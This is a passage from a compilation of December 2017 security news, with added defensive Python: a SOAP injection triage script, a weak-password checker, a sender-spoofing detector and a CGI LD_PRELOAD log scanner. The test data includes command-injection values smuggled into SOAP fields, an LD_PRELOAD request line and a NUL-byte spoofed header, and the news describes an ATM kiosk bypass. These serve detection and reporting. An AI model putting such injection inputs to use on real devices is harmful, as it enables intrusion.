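INJECTED_BODY = """<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body><u:SetConfig xmlns:u="urn:example:tr064-service">
    <NewStatusURL>$(echo HUAWEIUPNP)</NewStatusURL>
  </u:SetConfig></s:Body>
</s:Envelope>"""

# Same marker, but in a deliberately broken envelope to exercise the raw fallback.
BROKEN_BODY = "<s:Envelope><s:Body><NewNTPServer>;echo HUAWEIUPNP</NewNTPServer></s:Body>"

if __name__ == "__main__":
    for name, result in zip(("benign", "injected", "broken"),
                            triage([BENIGN_BODY, INJECTED_BODY, BROKEN_BODY])):
        print(name, result)
```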


China Has Shut Down 13,000 Websites Since 2015: Xinhua
30.12.2017 securityweek BigBrothers
China has shut down or revoked the licenses of 13,000 websites since 2015 for violating the country's internet rules, state media reported Sunday.

The news comes as the Communist country continues to strengthen its already tight regulation of the internet, a move which critics say has picked up pace since President Xi Jinping came to power in 2012.

Platforms have also closed nearly 10 million internet accounts for "violating service protocol", the official news agency said Sunday, likely referring to social media accounts.

"These moves have a powerful deterrent effect," Xinhua quoted Wang Shengjun, vice chairman of the Standing Committee of the National People's Congress (NPC), as saying.

Although China is home to the world's largest number of internet users, a 2015 report by US think tank Freedom House found that the country had the most restrictive online use policies of the 65 nations it studied, ranking below Iran and Syria.

This year alone, it has enacted new rules requiring foreign tech companies to store user data inside the country, imposed fresh content restrictions, and made it increasingly difficult to use software tools that allow users to circumvent censors.

Google, Facebook, Twitter and The New York Times are all blocked in China, among countless other foreign websites.

Beijing strictly defends what it calls "cyber sovereignty" and maintains that its various forms of web censorship -- collectively known as "The Great Firewall" -- are necessary for protecting its national security.

Within China, websites must register with authorities and are responsible for "ensuring the legality of any information" posted on their platforms, according to regulations in force since 2000.

When their content runs afoul of authorities, they can be shut down or fined.

One way to bypass the strictly controlled domestic internet is by using a virtual private network (VPN) which can allow users to access the unfiltered global internet. But here too authorities have cracked down.

Earlier this week, Wu Xiangyang from the southern Guangxi Zhuang autonomous region was sentenced to five and a half years in prison for selling a VPN service on Alibaba's Taobao and other marketplaces.


Two Romanians Charged With Hacking US Capital Police Cameras
30.12.2017 securityweek Crime
Two Romanian nationals have been arrested and charged with hacking into computer systems which controlled surveillance cameras for the Metropolitan Police Department in the US capital earlier this year, officials said Thursday.

A criminal complaint unsealed in Washington said the two -- Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28 -- were arrested in Bucharest on December 15 and charged with conspiracy and various forms of computer fraud.

The Justice Department said the pair managed to disable 123 of the police department's 187 outdoor surveillance cameras in early January by infecting computer systems with ransomware -- an effort "to extort money" in exchange for unlocking the computer, according to an affidavit filed in court.

The case "was of the highest priority" because it impacted efforts to plan security ahead of the 2017 presidential inauguration, according to officials.

The Secret Service and other agencies "quickly ensured that the surveillance camera system was secure and operational" and the investigation found no security threats as a result of the scheme.

Isvanca remains in custody in Romania and Cismaru is on house arrest there pending further legal proceedings, the Justice Department said.


2018 Cyber Security Predictions

28.12.2017 Symantec Cyber
As 2017 draws to a close, here is what you can expect over the course of the upcoming year
This past year, cyber criminals caused major service disruptions around the world, using their increasing technical proficiency to break through cyber defenses. In 2018, we expect the trend to become more pronounced as these attackers will use machine learning and artificial intelligence to launch even more potent attacks.

Gear up for a busy year ahead. Incidents like the WannaCry attack, which impacted more than 200,000 computers worldwide in May, are just the warmup to a new year of more virulent malware and DDoS attacks. Meanwhile, cyber criminals are poised to step up their attacks on the millions of devices now connected to the Internet of Things both in offices and homes.

As 2017 draws to a close, here is what you can expect over the course of the upcoming year:

Blockchain Will Find Uses Outside Of Cryptocurrencies, But Cyber criminals Will Focus On Coins and Exchanges

Blockchain is finally finding applications outside of crypto-currencies, expanding to inter-bank settlements, fuelled by increasing traction in IoT. However, these use cases are still in their infancy and are not the focus for most cyber criminals today. Instead of attacking Blockchain technology itself, cyber criminals will focus on compromising coin-exchanges and users’ coin-wallets since these are the easiest targets, and provide high returns. Victims will also be tricked into installing coin-miners on their computers and mobile devices, handing their CPU and electricity over to cyber criminals.

Cyber Criminals Will Use Artificial Intelligence (AI) & Machine Learning (ML) To Conduct Attacks

No cyber security conversation today is complete without a discussion about AI and ML. So far, these conversations have been focused on using these technologies as protection and detection mechanisms. However, this will change in the next year with AI and ML being used by cyber criminals to conduct attacks. It is the first year where we will see AI versus AI in a cybersecurity context. Cyber criminals will use AI to attack and explore victims’ networks, which is typically the most labour-intensive part of compromise after an incursion.

Supply Chain Attacks Will Become Mainstream

Supply chain attacks have been a mainstay of classical espionage and signals-intelligence operators, compromising upstream contractors, systems, companies and suppliers. They are highly effective, with nation-state actors using human intelligence to compromise the weakest links in the chain, as well as malware implants at the manufacture or distribution stage through compromise or coercion.

These attacks are now moving into the mainstream of cyber crime. With publicly available information on technology, suppliers, contractors, partnerships and key personnel, cyber criminals can find and attack weak links in the supply chain. With a number of high-profile, successful attacks in 2016 and 2017, cyber criminals will focus on this method in 2018.


File-less and File-light Malware Will Explode

2016 and 2017 have seen consistent growth in the amount of file-less and file-light malware, with attackers exploiting organizations that lack in preparation against such threats. With fewer Indicators of Compromise (IoC), use of the victims’ own tools, and complex disjointed behaviours, these threats have been harder to stop, track and defend against in many scenarios. Like the early days of ransomware, where early success by a few cyber criminals triggered a gold-rush like mentality, more cyber criminals are now rushing to use these same techniques. Although file-less and file-light malware will still be smaller by orders-of-magnitude compared to traditional-style malware, they will pose a significant threat and lead to an explosion in 2018.

Organisations Will Still Struggle With Security-as-a-Service (SaaS) Security

Adoption of SaaS continues to grow at an exponential rate as organizations embark on digital transformation projects to drive business agility. This rate of change and adoption present many security challenges as access control, data control, user behaviour and data encryption vary significantly between SaaS apps. While this is not new and many of the security problems are well understood, organizations will continue to struggle with all these in 2018.

Combined with new privacy and data protections laws going into effect globally, these will pose major implications in terms of penalties, and more importantly, reputational damage.

Organisations Will Still Struggle With Infrastructure-as-a-Service (IaaS) Security – More Breaches Due to Error, Compromise & Design

IaaS has completely changed the way organisations run their operations, offering massive benefits in agility, scalability, innovation and security. It also introduces significant risks, with simple errors that can expose massive amounts of data and take down entire systems. While security controls above the IaaS layer are a customer’s responsibility, traditional controls do not map well to these new cloud-based environments, leading to confusion, errors and design issues with ineffective or inappropriate controls being applied, while new controls are ignored. This will lead to more breaches throughout 2018 as organizations struggle to shift their security programs to be IaaS effective.

Financial Trojans Will Still Account For More Losses Than Ransomware

Financial Trojans were some of the first pieces of malware to be monetised by cyber criminals. From simple beginnings as credential-harvesting tools, they have since evolved into advanced attack frameworks that target multiple banks and banking systems, sending shadow transactions and hiding their tracks. They have proven to be highly profitable for cyber criminals. The move to mobile, application-based banking has curtailed some of their effectiveness, but cyber criminals are quickly moving their attacks to these platforms. Cyber criminals’ profits from Financial Trojans are expected to grow, giving them higher gains compared to Ransomware attacks.

Expensive Home Devices Will Be Held To Ransom

Ransomware has become a major problem and is one of the scourges of the modern Internet, allowing cyber criminals to reap huge profits by locking up users’ files and systems. The gold-rush mentality has not only pushed more and more cyber criminals to distribute ransomware, but also contributed to the rise of Ransomware-As-A-Service and other specializations in the cyber criminal underworld. These specialists are now looking to expand their attack reach by exploiting the massive increase in expensive connected home devices. Users are generally not aware of the threats to Smart TVs, smart toys and other smart appliances, making them an attractive target for cyber criminals.

IoT Devices Will Be Hijacked and Used in DDoS Attacks

In 2017, we have seen massive DDoS attacks using hundreds of thousands of compromised IoT devices in people’s homes and workplaces to generate traffic. This is not expected to change with cyber criminals looking to exploit the poor security settings and lax personal management of home IoT devices. Furthermore, the inputs and sensors of these devices will also be hijacked, with attackers feeding audio, video or other faked inputs to make these devices do what they want rather than what users expect them to do.

IoT Devices Will Provide Persistent Access to Home Networks

Beyond DDoS attacks and ransomware, home IoT devices will be compromised by cyber criminals to provide persistent access to a victim’s network. Home users generally do not consider the cyber security implications of their home IoT devices, leaving default settings and not vigilantly updating them like they do with their computers. Persistent access means that no matter how many times a victim cleans their machine or protects their computer, the attacker will always have a backdoor into victims’ network and the systems that they connect to.

Attackers Exploit The Move To DevOps

The agile, DevOps and DevSecOps movements are transforming IT and cyber-security operations in every organisation. With improved speed, greater efficiencies and more responsive delivery of IT services, this is quickly becoming the new normal. While all this works to the greater good, like any disruptive change, it offers opportunities not only for errors, but also for attackers to exploit. Much like the issues facing the move to SaaS and IaaS, organizations are struggling to apply security controls in these new models of CI/CD and automation. As environments change constantly, anomaly detection gets harder, with many existing systems creating far too many false positives to be effectively dealt with. In the next year, we’ll see a greater number of attackers taking advantage of this to cover their activities inside a victim’s environment.

Cryptowars Redux Enters Its Second Phase

The cryptowars were fought and won in the 1990s, or so everyone thought. Over the last two years, however, the struggle has re-emerged with governments, policy makers, law enforcement, technology companies, telcos, advertisers, content providers, privacy bodies, human rights organisations and pretty much everyone expressing different opinions on how encryption should be used, broken, circumvented or applied. The war will continue to be fought on a mostly privacy versus government surveillance basis, particularly for device and communications (email and messaging) encryption. Beyond that, though, expect to see content providers, telcos and advertisers influencing much of the adoption of transport layer encryption, as it’s often viewed as being at odds with their business models.


Kernel Exploit for Sony PS4 Firmware 4.05 Released, Jailbreak Coming Soon
27.12.2017 thehackernews
Exploit

Wishing you all a very 'belated' Merry Christmas. This holiday season Santa has a very special gift for all PlayStation gamers.
Developer SpecterDev finally released a fully-functional much-awaited kernel exploit for PlayStation 4 (firmware 4.05) today—almost two months after Team Fail0verflow revealed the technical details of it.
Now available on Github, dubbed "namedobj," the kernel exploit for the PlayStation 4 on 4.05FW allows users to run arbitrary code on the gaming console, enabling jailbreaking and kernel-level modifications to the system.
Although the PS4 kernel exploit does not include jailbreak code, others can develop a full jailbreak using it.
Jailbreaking allows users to run custom code on the console and install mods, cheats, third-party applications, and games that are typically not possible because of the anti-piracy mechanisms implemented on the Sony PlayStation.
"This release, however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew," SpecterDev said.
"This exploit does include a loader that listens for payloads on port 9020 and will execute them upon receival."
It should be noted that for some users it may not work as smoothly as it sounds.
"This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel. I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads," SpecterDev warned.
PS4 gamers who are running a firmware version lower than 4.05 can simply update their console to take advantage of this exploit.
Of course, Sony would not be happy with the launch of PlayStation 4 kernel exploit and would be trying hard to eliminate any vulnerability for the most recent version of PS4 firmware.


For the second year in a row, “123456” was the top password found in data dumps in 2017
27.12.2017 securityaffairs  Hacking

For the second year in a row, “123456” was the top password found in data dumps in 2017, despite numerous warnings to use strong passwords.
For the second year in a row, “123456” was the top password among the millions of cleartext passwords exposed online due to the numerous data breaches suffered by organizations and private firms.

The list was published by researchers at SplashData who analyzed more than five million user records containing passwords that were leaked online in 2017.

“Use of any of the passwords on this list would put users at grave risk for identity theft,” said a SplashData spokesperson in a press release.

The list of Top 100 Worst Passwords of 2017 is embarrassing, it includes a huge number of sports terms (football, baseball, soccer, hockey, Lakers, jordan23, golfer, Rangers, Yankees) and car brands (Corvette, Ferrari, Harley, Mercedes).

Users continue to use common names as their passwords: names like Robert (#31), Matthew (#32), Jordan (#33), Daniel (#35) and many others continue to be widely used.


Top passwords are the basic components of the dictionaries used by hackers in brute-force attacks. Attackers will also use the top password list to create common variations of these words using simple algorithms, for example by adding a digit or other character combinations at the start or end of the words.

Despite the numerous reports published by experts, users continue to adopt weak passwords and tend to reuse them across several web services.

Let me close the post with the list of the Top 10 passwords extracted from the SplashData report.

1 – 123456 (rank unchanged since 2016 list)
2 – password (unchanged)
3 – 12345678 (up 1)
4 – qwerty (Up 2)
5 – 12345 (Down 2)
6 – 123456789 (New)
7 – letmein (New)
8 – 1234567 (Unchanged)
9 – football (Down 4)
10 – iloveyou (New)
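Because attackers extend the top list with exactly the trivial variations described above (digits or symbols at the ends, letter-for-symbol swaps), a password check that compares only the literal string misses most of what the list implies. The following Python is an added example, not SplashData’s code: it normalises a candidate into the base forms it could be a variant of and checks those against the list; the ten entries embedded are the article’s top ten, and a real deployment would load the full list or a breached-password corpus.

```python
"""Check a candidate password against the SplashData top list, including the
trivial variants (added digits or symbols, leet-style swaps) that attackers
generate from it.

Added example, not SplashData's code. Only the article's top ten are embedded;
a real deployment would load the full list or a breached-password corpus.
"""
import string
from typing import Dict, Iterable, List, Optional

# The article's top ten for 2017, lower-case.
TOP_PASSWORDS_2017 = [
    "123456", "password", "12345678", "qwerty", "12345",
    "123456789", "letmein", "1234567", "football", "iloveyou",
]

# Common swaps attackers try; reversing them maps "p@ssw0rd" back to "password".
LEET_TO_PLAIN = str.maketrans({
    "0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t",
    "@": "a", "$": "s", "!": "i",
})
# Characters typically bolted onto the start or end of a dictionary word.
EDGE_CHARS = string.digits + string.punctuation


def candidate_forms(candidate: str) -> List[str]:
    """Base forms the candidate could be a variant of, most literal first.

    Order matters: the exact lower-cased string is tried before any stripped
    or de-leeted form, so "123456" matches itself rather than its (empty)
    remainder after digit stripping.
    """
    low = candidate.lower()
    stripped = low.strip(EDGE_CHARS)
    forms: List[str] = []
    for f in (low, stripped, low.translate(LEET_TO_PLAIN),
              stripped.translate(LEET_TO_PLAIN)):
        if f and f not in forms:
            forms.append(f)
    return forms


def weak_password_match(candidate: str,
                        blocklist: Iterable[str] = TOP_PASSWORDS_2017) -> Optional[str]:
    """Return the blocklist entry the candidate is, or is a trivial variant of, else None."""
    block = {p.lower() for p in blocklist}
    for form in candidate_forms(candidate):
        if form in block:
            return form
    return None


def audit(passwords: Iterable[str]) -> Dict[str, str]:
    """Map each weak password in a batch to the list entry it matched (non-weak ones are omitted)."""
    return {p: m for p in passwords if (m := weak_password_match(p))}


if __name__ == "__main__":
    # Constructed sample batch, e.g. from a password-policy dry run.
    print(audit(["123456", "P@ssw0rd2017!", "Football!!", "LetMeIn99", "Tr0ub4dor&3"]))
```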


The popular cryptocurrency exchange EtherDelta suffered a DNS attack
27.12.2017 securityaffairs  Hacking

The popular cryptocurrency exchange EtherDelta was hacked: attackers conducted a DNS attack that allowed them to steal at least 308 ETH ($266,789) as well as a large number of tokens.
The spike in cryptocurrency values is attracting cybercriminals; the latest victim is the popular cryptocurrency exchange EtherDelta, which announced a potential attack against its DNS server.
As a result of the attack, the exchange suspended its service. Below is the tweet sent by the company confirming that its server was hacked.


EtherDelta
@etherdelta
Dear users, we have reason to believe that there had been malicious attacks that temporarily gained access to @etherdelta http://EtherDelta.com DNS server. We are investigating this issue right now - in the meantime please DO NOT use the current site.

9:34 PM - Dec 20, 2017
The attackers spoofed EtherDelta’s domain to trick users into sending money.

“At least 308 ETH ($266,789) were stolen, as well as a large number of tokens potentially worth hundreds of thousands of dollars.” reported Mashable.

EtherDelta posted another tweet to warn its users, explaining that the impostor’s app had no chat button on the navigation bar, nor the official Twitter feed at the bottom right. EtherDelta advised all users not to use the site.


EtherDelta
@etherdelta
⚠️ 2/2 *BE AWARE* The imposter's app has no CHAT button on the navigation bar nor the official Twitter Feed on the bottom right. It is also populated with a fake order book.

9:48 PM - Dec 20, 2017
On Dec. 22, the service was fully restored. The company clarified that users using MetaMask or a hardware wallet on EtherDelta were not affected by the attack, and users who had never imported their private key on the impostor’s phishing site are also safe.


Recently another cryptocurrency exchange, South Korea's Youbit, went bankrupt after suffering a major cyber attack for the second time this year.

In early December, the cryptocurrency mining marketplace NiceHash confirmed it had fallen victim to a hacking attack that resulted in the loss of $60m worth of Bitcoin.

The EtherDelta hack is emblematic: even though EtherDelta is supposed to be decentralized, the attack against its website caused serious problems for the company's operations.

 


Mozilla patches five issues in Thunderbird, including a critical flaw
27.12.2017 securityaffairs
Vulnerability

Mozilla issued a critical security update to address five flaws in the popular open-source Thunderbird email client.
The latest release, Thunderbird 52.5.2, fixes the vulnerabilities: one rated critical, two rated high, one moderate and one low.

The most severe flaw fixed in Thunderbird 52.5.2 is a critical buffer overflow vulnerability (tracked as CVE-2017-7845) that affects Thunderbird running on Windows.

“A buffer overflow occurs when drawing and validating elements using Direct 3D 9 with the ANGLE graphics library, used for WebGL content. This is due to an incorrect value being passed within the library during checks and results in a potentially exploitable crash.” reads the security advisory published by the Mozilla Foundation.

The two vulnerabilities rated high are CVE-2017-7846 and CVE-2017-7847. The first one (CVE-2017-7846) affects Thunderbird’s RSS reader.

“It is possible to execute JavaScript in the parsed RSS feed when the RSS feed is viewed as a website, e.g. via “View -> Feed article -> Website” or in the standard format of “View -> Feed article -> default format”.” reads the advisory.

The second high-severity issue, tracked as CVE-2017-7847, also affects the RSS reader.

“Crafted CSS in an RSS feed can leak and reveal local path strings, which may contain user name.” states the advisory.


The moderate issue, tracked as CVE-2017-7848, also affects the RSS reader, while the low-severity issue, tracked as CVE-2017-7829, affects email display.

“It is possible to spoof the sender’s email address and display an arbitrary sender address to the email recipient. The real sender’s address is not displayed if preceded by a null character in the display string.” reads Mozilla’s advisory.
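An added example, not Mozilla's code, of what the CVE-2017-7829 null-character trick looks like at the header level and how a mail-filtering check can flag it: the NUL-terminated rendering is a model of the behaviour the advisory describes, not Thunderbird's actual code, and both messages are constructed.

```python
"""Spotting null-character sender spoofing in From headers (CVE-2017-7829 class).

Added illustration, not Mozilla's code: ``naive_render`` models a display
routine that stops at the first NUL, which is the behaviour the advisory
describes; Thunderbird's real rendering path is not reproduced here.
"""
import re

# Constructed sample messages (not taken from any real mail).  In the first one
# the display name ends with a look-alike address followed by a NUL byte, so a
# NUL-terminated renderer never reaches the real mailbox that follows.
SPOOFED_MSG = (
    "From: ceo@bank.example <ceo@bank.example>\x00 <mallory@evil.example>\r\n"
    "To: victim@example.org\r\n"
    "Subject: Urgent wire transfer\r\n"
    "\r\n"
    "Please approve the attached payment.\r\n"
)
BENIGN_MSG = (
    "From: Alice Example\r\n"
    " <alice@example.org>\r\n"          # folded header line, still one value
    "To: bob@example.org\r\n"
    "Subject: lunch\r\n"
    "\r\n"
    "noon?\r\n"
)

CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")
ANGLE_ADDR = re.compile(r"<([^<>\s]+@[^<>\s]+)>")
BARE_ADDR = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def from_header(raw_message: str) -> str:
    """Return the unfolded value of the first From: header ('' if absent)."""
    head = raw_message.split("\r\n\r\n", 1)[0].split("\r\n")
    parts, collecting = [], False
    for line in head:
        if collecting and line[:1] in (" ", "\t"):   # continuation line
            parts.append(line.strip())
        elif collecting:
            break
        elif line.lower().startswith("from:"):
            parts.append(line[5:].strip())
            collecting = True
    return " ".join(parts)


def naive_render(header_value: str) -> str:
    """Model of the buggy display: a C-string stops at the first NUL."""
    return header_value.split("\x00", 1)[0].strip()


def safe_render(header_value: str) -> str:
    """Escape control characters so nothing in the header can hide text."""
    return CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group()), header_value)


def real_address(header_value: str) -> str:
    """The routable mailbox is the last angle-bracketed address; everything
    before it is sender-controlled display text."""
    addrs = ANGLE_ADDR.findall(header_value)
    return addrs[-1].lower() if addrs else ""


def check_from_header(header_value: str) -> dict:
    """Flag a From header whose displayed text could mislead about the real sender."""
    shown = naive_render(header_value)
    real = real_address(header_value)
    # Addresses that appear in what the user would see but are not the real mailbox.
    decoys = sorted({a.lower() for a in BARE_ADDR.findall(shown)} - {real})
    control = len(CONTROL_CHARS.findall(header_value))
    return {
        "control_chars": control,
        "naive_display": shown,
        "safe_display": safe_render(header_value),
        "real_address": real,
        "decoy_addresses": decoys,
        "suspicious": control > 0 or bool(decoys),
    }


if __name__ == "__main__":
    for label, msg in (("spoofed", SPOOFED_MSG), ("benign", BENIGN_MSG)):
        print(label, check_from_header(from_header(msg)))
```

The spoofed message renders as `ceo@bank.example <ceo@bank.example>` under the naive display while the real mailbox is `mallory@evil.example`; the check reports both the control character and the decoy address.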


The spike in Bitcoin price is making it a less useful payment method in the cybercrime underground
27.12.2017 securityaffairs CyberCrime

The recent spike in the Bitcoin price and the fees associated with each transaction are making Bitcoin a less useful payment method in the cybercrime underground.
We have long debated the use of unregulated virtual currencies like Bitcoin in the criminal underground. Virtual currencies play a crucial role in facilitating illicit commerce, so it is natural that their fluctuations have a significant impact on the criminal ecosystem. The recent spike in the price of Bitcoin and the fees associated with each transaction are making Bitcoin a less useful payment method in the cybercrime underground.

Originally, one of Bitcoin's strengths was that payments would be fast, cheap, and convenient. This was true until the beginning of this year, when Bitcoin fees were often less than $0.10.


The spike in the Bitcoin value and the related fees per transaction have made Bitcoin far less attractive for the small-dollar transactions that represent the vast majority of payments in the criminal underground.

“As a result, several major underground markets that traffic in stolen digital goods are now urging customers to deposit funds in alternative virtual currencies, such as Litecoin. Those who continue to pay for these commodities in Bitcoin not only face far higher fees, but also are held to higher minimum deposit amounts.” wrote the popular investigator and security blogger Brian Krebs.

Krebs cited as an example the black marketplace “Carder’s Paradise”, which he recently analyzed and whose administrators admitted difficulties due to the spike in the value of Bitcoin.

Krebs explained that the current minimum deposit amount on Carder’s Paradise is 0.0066 BTC (roughly USD $100). The deposit fee for each transaction is $15.14, which means that every time a user of the black market deposits the minimum amount into this shop, they lose approximately 15 percent of the deposit in transaction fees.

“The problem is that we send all your deposited funds to our suppliers which attracts an additional Bitcoin transaction fee (the same fee you pay when you make a deposit),” Carder’s Paradise explains. “Sometimes we have to pay as much as 5$ from every 1$ you deposited.”

“We have to take additionally a ‘Deposit fee’ from all users who deposit in Bitcoins. This is the amount we spent on transferring your funds to our suppliers. To compensate your costs, we are going to reduce our prices, including credit cards for all users and offer you the better bitcoin exchange rate.”

“The amount of the Deposit Fee depends on the load on the Bitcoin network. However, it stays the same regardless of the amount deposited. Deposits of 10$ and 1000$ attract the same deposit fee.”

“If the Bitcoin price continues increasing, this business is not going to be profitable for us anymore because all our revenue is going to be spent on the Bitcoin fees. We are no longer in possession of additional funds to improve the store.”

“We urge you to start using Litecoin as much as possible. Litecoin is a very fast and cheap way of depositing funds into the store. We are not going to charge any additional fees if you deposit Litecoins.”

In the case of Carder’s Paradise, the huge volume of transactions allowed the administrators to lower the price of stolen credit cards to compensate for the increase in transaction fees, but this is an exceptional scenario.

“Our team made a decision to adjust the previous announcement and provide a fair solution for everyone by reducing the credit cards [sic] prices,” the message concludes.

Transaction fees are too high and operators of black marketplaces could be forced to refuse payments in Bitcoin.


Three fake Bitcoin wallet apps were removed from the official Google Play
27.12.2017 securityaffairs Android

Researchers from the mobile security firm Lookout have discovered three fake Bitcoin wallet apps in the official Play store; Google promptly removed them.
Experts from mobile security firm Lookout discovered three fake Bitcoin wallet apps in the official Play store. The fake Bitcoin wallet apps were removed from Google Play after the security researchers reported their discovery to the tech giant.

The spike in Bitcoin prices is attracting crooks as never before; the number of attacks involving the cryptocurrency continues to increase.

The three fake applications, tracked as PickBitPocket, were developed to present the attacker’s Bitcoin address instead of the seller’s. The fake apps accounted for a total of up to 20,000 downloads before Google removed them from the Play store.

“Lookout has identified three Android apps disguised as bitcoin wallet apps, previously in the Google Play Store, that trick victims into sending bitcoin payments to attacker-specified bitcoin addresses.” reads the analysis published by Lookout.

“Google removed the apps immediately after Lookout notified the company. The apps collectively had up to 20,000 downloads at time of removal.”

The researchers explained that when users who installed the fake apps attempt to buy goods or services, their payments are hijacked to the attacker’s wallet.

The three fake Bitcoin wallet apps discovered by Lookout are:

Bitcoin mining, which had between 1,000 and 5,000 installs at the time it was removed;
Blockchain Bitcoin Wallet – Fingerprint, which had between 5,000 and 10,000 installs;
Fast Bitcoin Wallet, which had between 1,000 and 5,000 installs.

“As Bitcoin captures broader interest, this means more people may be purchasing the cryptocurrency, or looking for mobile wallets to store their coins. Individuals should be vigilant in choosing a secure wallet and should also have a security solution in place to identify malicious activity on their device,” concluded Lookout.


ATMs operated by a Russian Bank could be hacked by pressing five times the ‘Shift’ key
27.12.2017 securityaffairs Hacking

ATMs operated by Sberbank that run Windows XP are affected by easily exploitable security vulnerabilities; they could be hacked by pressing the ‘Shift’ key five times.
We have warned several times of the risks of ATMs running the outdated Windows XP operating system. These systems can be easily hacked, as recently discovered by an employee of the Russian blogging platform Habrahabr who reported that the ATMs operated by Sberbank running Windows XP are affected by easily exploitable security vulnerabilities.

The user discovered that the full-screen lock that prevents access to various components of the ATM operating system could be bypassed by pressing special keys like SHIFT, CTRL, ALT, and WINDOWS five times.

Pressing the SHIFT key five times opens a Windows settings window and reveals the taskbar and Start menu of the operating system; with this trick, users can access Windows XP through the touchscreen.

“Well, I, standing at the terminal of the Savings Bank with a full-sized keyboard and waiting for the operator to answer the phone, decided to press this Shift from boredom, naively believing that without functional keys this would lead to nothing. No matter how it is! Five times quick pressing of this key gave me that very little window, besides revealing the task panel with all the bank software.” wrote the user.

“Stopping the work of the batch file (see the taskbar on the video below), and then all the banking software, you can break the terminal.”

This vulnerability allows hackers to modify ATM boot scripts and install malicious code on the machine.

The user tried to report the issue to the Sberbank contact center, but unfortunately the operator was not able to help him and suggested that he contact the support service using the phone number written on the terminal itself.

According to the German website WinFuture, Sberbank had been informed of the security flaw in its ATMs almost two weeks ago. The bank confirmed that it had immediately fixed the security issue, but the user who discovered the flaw claimed that the issue was still present on the terminal he visited.

“In tech support, a friendly girl after I said that I want to report a vulnerability, immediately switched me to some other specialist. He first asked how to contact me and the terminal number, then on the nature of the problem, then I listened to music for a long time, and, after all, the guy said that the problem is fixed.” continues the user.

“All this happened on the sixth of December. Two weeks later I decided to check that there is a terminal. Still, after all, they said that they “fixed” the problem, probably they should have already eliminated it, but no – it’s still there, the window still pops up.”

Security experts urge financial institutions to update their ATMs to the latest version of Windows.


Experts discovered a flaw in GoAhead that affects hundreds of thousands IoT devices
26.12.2017 securityaffairs IoT

Experts from Elttam discovered a flaw in the GoAhead tiny web server that affects hundreds of thousands of IoT devices; it could be exploited to remotely execute malicious code on affected devices.
A vulnerability in the GoAhead tiny web server package, tracked as CVE-2017-17562, affects hundreds of thousands of IoT devices. The GoAhead solution is widely adopted by tech giants, including Comcast, IBM, Boeing, Oracle, D-Link, ZTE, HP, Siemens, and Canon. It is easy to find the tiny web server in almost any IoT device, including printers and routers.

The vulnerability was discovered by experts from the security firm Elttam who devised a method to remotely execute malicious code on devices running the GoAhead web server package. The flaw affects all GoAhead versions before GoAhead 3.6.5.

“This blog post details CVE-2017-17562, a vulnerability which can be exploited to gain reliable remote code execution in all versions of the GoAhead web server < 3.6.5.” reads the analysis published by Elttam.

“The vulnerability is a result of Initialising the environment of forked CGI scripts using untrusted HTTP request parameters, and will affect all user’s who have CGI support enabled with dynamically linked executables (CGI scripts). This behavior, when combined with the glibc dynamic linker, can be abused for remote code execution using special variables such as LD_PRELOAD (commonly used to perform function hooking, see preeny).”

Attackers can exploit the vulnerability if CGI support is enabled with dynamically linked CGI programs. Unfortunately, this configuration is quite common.
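As an added example (not GoAhead or Embedthis code), the vulnerable pattern the write-up describes is shown next to one hardened construction, together with a check over constructed access-log lines; the `CGI_` prefix, the `/cgi-bin/` path, the log format and the variable deny-list are this example's own assumptions, not the vendor's actual fix.

```python
"""CGI environment built from HTTP parameters: the CVE-2017-17562 pattern.

Added example, not GoAhead/Embedthis code.  ``build_env_vulnerable`` models
the bug the Elttam write-up describes (every request parameter becomes an
environment variable of the forked CGI program); ``build_env_hardened`` is
one defensive construction chosen here (deny loader/shell variables, prefix
the rest), not the vendor's actual fix.  The /cgi-bin/ path and the log
format are assumptions for the sample data.
"""
import re
from urllib.parse import parse_qsl

# Environment variable names that change how the dynamic linker or a shell
# behaves.  Non-exhaustive; LD_PRELOAD is the one the write-up names.
LOADER_PREFIXES = ("LD_", "DYLD_")
SHELL_SENSITIVE = {"PATH", "IFS", "ENV", "BASH_ENV", "GCONV_PATH"}
SAFE_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_]*$")


def parse_query(query_string: str):
    """Split a query string into (name, value) pairs, keeping blank values."""
    return parse_qsl(query_string, keep_blank_values=True)


def is_dangerous_name(name: str) -> bool:
    upper = name.upper()
    return upper.startswith(LOADER_PREFIXES) or upper in SHELL_SENSITIVE


def build_env_vulnerable(server_env: dict, params) -> dict:
    """The flawed pattern: parameters are exported verbatim, so a request can
    set LD_PRELOAD (or PATH) for the dynamically linked CGI program."""
    env = dict(server_env)
    for name, value in params:
        env[name] = value
    return env


def build_env_hardened(server_env: dict, params):
    """Refuse loader/shell variables and malformed names; namespace the rest
    under CGI_ so a parameter can never shadow a server-set variable."""
    env = dict(server_env)
    rejected = []
    for name, value in params:
        if not SAFE_NAME.match(name) or is_dangerous_name(name):
            rejected.append(name)
            continue
        env["CGI_" + name] = value
    return env, rejected


# Constructed access-log lines (Common Log Format) for the detection check.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Dec/2017:06:07:01 +0000] "GET /cgi-bin/status?LD_PRELOAD=/tmp/x.so HTTP/1.1" 200 512
198.51.100.4 - - [19/Dec/2017:06:07:02 +0000] "GET /cgi-bin/status?lang=en HTTP/1.1" 200 512
192.0.2.9 - - [19/Dec/2017:06:07:03 +0000] "GET /index.html?LD_PRELOAD=x HTTP/1.1" 200 1024
"""
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def suspicious_cgi_requests(log_text: str, cgi_prefix: str = "/cgi-bin/"):
    """Return (client, path, [bad parameter names]) for requests that try to
    feed loader/shell variable names to a CGI endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        path, _, query = target.partition("?")
        if not path.startswith(cgi_prefix):
            continue
        bad = [n for n, _ in parse_query(query) if is_dangerous_name(n)]
        if bad:
            hits.append((client, path, bad))
    return hits


if __name__ == "__main__":
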